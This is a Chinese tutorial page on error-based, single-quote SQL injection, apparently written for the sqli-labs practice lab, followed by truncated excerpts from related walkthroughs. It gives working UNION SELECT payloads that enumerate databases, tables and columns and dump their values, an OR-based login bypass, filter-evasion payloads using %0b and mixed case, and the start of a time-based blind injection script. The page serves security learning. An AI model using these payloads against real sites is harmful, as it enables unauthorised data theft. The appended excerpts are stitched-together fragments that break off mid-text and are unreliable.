sql注入基于错误-单引号-字符型

查找注入点

在url中:

1. ‘

2. and 1=1/and 1=2

3. 随即输入(整形)

4. -1/+1回显上下页面(整形)

5. and sleep(5) (判断页面返回时间)

判断有多少列

order by .....

爆显示位

id=88888888‘) union select 1,2,3 --+

先获取数据库:

id=‘)  union select 1,2,group_concat(distinct+table_schema) from information_schema.columns  --+

再获取数据库的所有表:

id=‘) union select 1,2,group_concat(distinct+table_name) from information_schema.columns where table_schema=‘库名‘ --+

再获取表中的字段:

id=‘)  union select 1,2,group_concat(distinct+column_name) from information_schema. columns where table_name=‘表名‘ --+

再获取字段信息

id=‘)  union select 1,2,group_concat(id,sessid,secret_EXS6,tryy) from 库名.表名--+

时间: 2024-10-29 08:30:33

sql注入基于错误-单引号-字符型的相关文章

【sqli-labs】 less11 POST - Error Based - Single quotes- String (基于错误的POST单引号字符型注入)

查看源码,用户名和密码通过post提交 加单引号提交 出现报错,推测对应的SQL语句 select ... from ... where xxx=''' and yyy='123' limit 0,1 直接使用or构造永真登录 成功,注意此处登录的用户为表中的第一个用户 需要改变用户可以通过改变筛选条件实现 作为表中的第二个用户登录 如果在客户端进行了敏感字符的输入限定,可以直接使用hackbar提交POST数据绕过 如果采用构造这种输入,登录会失败,原因是因为and的优先级是高于or的 yyy

Less(28)GET - Error Based- All your UNION & SELECT belong to us String-Single quote without parenthesis基于错误的,单引号字符型,过滤了union和select等的注入

1.这个和Less(27)差不多,就是把参数变成 id=('1') 2.爆破 (1)爆库:?id=0')%0buniOn%0bsElEct%0b1,database(),3%0bor%0b('1')=('1 (2)爆表:?id=0')%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b('

PLSQL入门:cursor传参,loop fetch使用,if使用,单引号字符表示

1.cursor传入参数 定义:cursor [cursor变量名称]([参数名称] [参数类型]) IS [SQL语句,可以使用传入参数] 例子:    cursor moTypeNames(domain VARCHAR2) IS      select t1.modelname from pm4h_mo.mdl_resmodel t1,pm4h_mo.mdl_domain t2       where t2.domainname=domain      and t1.domainid = t

SQL语句中有关单引号、双引号和加号的问题

字符串数据是用单引号包在外面的,而+号只是用来连接这些字符串的. 数据库里的字段是整型的时候不要加单引号,是字符串的时候要加,其它类型根据实际情况来,双引号就是用来拼接字符串的,单引号是sql文的固有写法,因为你要动态的来拼接,涉及到变量,所以要用"+"来组合各个字符串片段.最终结果无非就是得出能在数据库查询分析器中执行的sql文. String sql = "insert into student values ( " + student.getId() + &q

【sqli-labs】 less27 GET- Error based -All you Union&Select Belong to us -String -Single quote(GET型基于错误的去除了Union和Select的单引号字符串型注入)

看一下过滤函数 看一下/s是什么东西 那直接通过大小写就可以绕过了 http://192.168.136.128/sqli-labs-master/Less-27/?id=0'%a0uNion%a0sElect%a01,2,%273 原文地址:https://www.cnblogs.com/superkrissV/p/8371847.html

【sqli-labs】 less2 GET - Error based - Intiger based (基于错误的GET整型注入)

与less1相同,直接走流程 提交参数,直接order by http://localhost/sqli/Less-2/?id=1 order by 1%23 http://localhost/sqli/Less-2/?id=-1 union select 1,2,3%23 http://localhost/sqli/Less-2/?id=-1 union select 1,database(),user()%23 http://localhost/sqli/Less-2/?id=-1 unio

sql注入--基于报错的注入

这是经典的sqli-labs 中的less-5 问题首先通过几个常见的进行测试, 发现只要正确的话就会输出you are in.... 并不能绕过,因此不能出现敏感信息,因此要用一种新思路(参考白帽学院的教程)基于报错的注入,如图,在数据库上测试,产生报错 http://localhost/sqlilabs/Less-5/index.php?id=3' and (select 1 from(select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a

sql注入------基于时间延迟benchmark函数注入脚本

import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '' extend = 0 list = [] length2 = 0 num = [] num1 = [] url1 = 'http://127.0.0.

通过sqli-labs学习sql注入——进阶挑战之less23-28a

本文链接:http://blog.csdn.net/u012763794/article/details/51457142 这次我又来了,Advanced Injections(进阶挑战),就是一些过滤绕过的东西了,基础挑战看这个两篇 最近搞逆向破解去了,http://www.giantbranch.cn/myblog/?p=27,所以这个拖得太久了,今天完工 通过sqli-labs学习sql注入--基础挑战之less1-10 http://blog.csdn.net/u012763794/ar